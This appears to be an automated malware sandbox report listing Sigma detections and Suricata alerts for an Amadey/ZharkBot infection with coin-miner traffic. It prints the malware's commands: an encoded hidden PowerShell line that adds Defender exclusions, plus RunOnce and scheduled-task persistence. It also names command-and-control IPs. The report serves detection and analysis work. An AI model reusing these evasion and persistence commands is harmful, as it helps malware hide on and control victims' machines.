QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUA, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUA, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Pictures\Illumination.pif, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\trSK2fqPeB.exe, ProcessId: 7680, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\IlluminatedControls

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\Pictures\Illumination.pif" , CommandLine: "C:\Users\user\Pictures\Illumination.pif" , CommandLine|base64offset|contains: , Image: C:\Users\user\Pictures\Illumination.pif, NewProcessName: C:\Users\user\Pictures\Illumination.pif, OriginalFileName: C:\Users\user\Pictures\Illumination.pif, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Pictures\Illumination.pif" , ProcessId: 5224, ProcessName: Illumination.pif

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F, CommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe, ParentProcessId: 8052, ParentProcessName: kitty.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F, ProcessId: 8076, ProcessName: schtasks.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUA, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUA, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7728, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:29.705869+0200
SID:	2054413
Severity:	1
Source Port:	50028
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:55.928351+0200
SID:	2054413
Severity:	1
Source Port:	49965
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:14.525078+0200
SID:	2054413
Severity:	1
Source Port:	49881
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:30.633111+0200
SID:	2054413
Severity:	1
Source Port:	49913
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:29.288415+0200
SID:	2803270
Severity:	2
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:29.288415+0200
SID:	2054413
Severity:	1
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:51.052311+0200
SID:	2054413
Severity:	1
Source Port:	50175
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:27.800653+0200
SID:	2044597
Severity:	1
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:23.440990+0200
SID:	2054413
Severity:	1
Source Port:	50019
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:29.540398+0200
SID:	2054413
Severity:	1
Source Port:	50134
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:55.789940+0200
SID:	2054413
Severity:	1
Source Port:	50186
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:09.462487+0200
SID:	2803270
Severity:	2
Source Port:	49746
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:09.462487+0200
SID:	2054413
Severity:	1
Source Port:	49746
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Response M1 - Source IP: 185.215.113.19 - Destination IP: 192.168.2.4

Timestamp:	2024-08-31T22:41:59.347319+0200
SID:	2856122
Severity:	1
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:41.407249+0200
SID:	2054413
Severity:	1
Source Port:	50049
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:03.634866+0200
SID:	2054413
Severity:	1
Source Port:	50088
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:03.846580+0200
SID:	2054413
Severity:	1
Source Port:	49981
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:02.174685+0200
SID:	2044696
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:41:57.758960+0200
SID:	2044597
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:44.339713+0200
SID:	2054413
Severity:	1
Source Port:	50161
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:22.080354+0200
SID:	2054413
Severity:	1
Source Port:	50120
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:45.200959+0200
SID:	2054413
Severity:	1
Source Port:	50057
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:28.286178+0200
SID:	2054413
Severity:	1
Source Port:	50131
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:11.371315+0200
SID:	2044597
Severity:	1
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:26.378243+0200
SID:	2054413
Severity:	1
Source Port:	49783
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:18.202802+0200
SID:	2054413
Severity:	1
Source Port:	50009
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:42.796744+0200
SID:	2054413
Severity:	1
Source Port:	50052
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:35.238140+0200
SID:	2054413
Severity:	1
Source Port:	49921
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:57.366217+0200
SID:	2054413
Severity:	1
Source Port:	50077
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:35.598039+0200
SID:	2054413
Severity:	1
Source Port:	50041
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:38.288791+0200
SID:	2054413
Severity:	1
Source Port:	49821
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:17.705270+0200
SID:	2044597
Severity:	1
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:29.405177+0200
SID:	2054413
Severity:	1
Source Port:	49911
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:52.102813+0200
SID:	2054413
Severity:	1
Source Port:	49955
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:58.873335+0200
SID:	2054413
Severity:	1
Source Port:	49970
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:33.362514+0200
SID:	2054413
Severity:	1
Source Port:	49918
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:18.451951+0200
SID:	2054413
Severity:	1
Source Port:	49889
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:27.857813+0200
SID:	2054413
Severity:	1
Source Port:	49786
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:33.729408+0200
SID:	2044597
Severity:	1
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:23.854833+0200
SID:	2803270
Severity:	2
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:23.854833+0200
SID:	2054413
Severity:	1
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:53.355284+0200
SID:	2054413
Severity:	1
Source Port:	49959
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:46:01.325211+0200
SID:	2054413
Severity:	1
Source Port:	50194
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:17.003141+0200
SID:	2054413
Severity:	1
Source Port:	50007
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:24.582408+0200
SID:	2054413
Severity:	1
Source Port:	50124
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:58.899042+0200
SID:	2054413
Severity:	1
Source Port:	50080
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:21.886612+0200
SID:	2054413
Severity:	1
Source Port:	49773
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:07.243035+0200
SID:	2044597
Severity:	1
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:00.528171+0200
SID:	2054413
Severity:	1
Source Port:	50082
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:37.793637+0200
SID:	2054413
Severity:	1
Source Port:	49926
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:22.223268+0200
SID:	2054413
Severity:	1
Source Port:	50017
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:02.121235+0200
SID:	2044597
Severity:	1
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:39.112866+0200
SID:	2044597
Severity:	1
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:41.593802+0200
SID:	2054413
Severity:	1
Source Port:	49933
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:53.220271+0200
SID:	2803270
Severity:	2
Source Port:	49841
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:53.220271+0200
SID:	2054413
Severity:	1
Source Port:	49841
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO COINMINER XMR CoinMiner Usage - Source IP: 192.168.2.4 - Destination IP: 161.35.34.195

Timestamp:	2024-08-31T22:41:49.900099+0200
SID:	2826930
Severity:	2
Source Port:	49835
Destination Port:	3333
Protocol:	TCP
Classtype:	Crypto Currency Mining Activity Detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:59.979216+0200
SID:	2054413
Severity:	1
Source Port:	49854
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:39.057002+0200
SID:	2054413
Severity:	1
Source Port:	50046
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:15.846651+0200
SID:	2054413
Severity:	1
Source Port:	49884
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

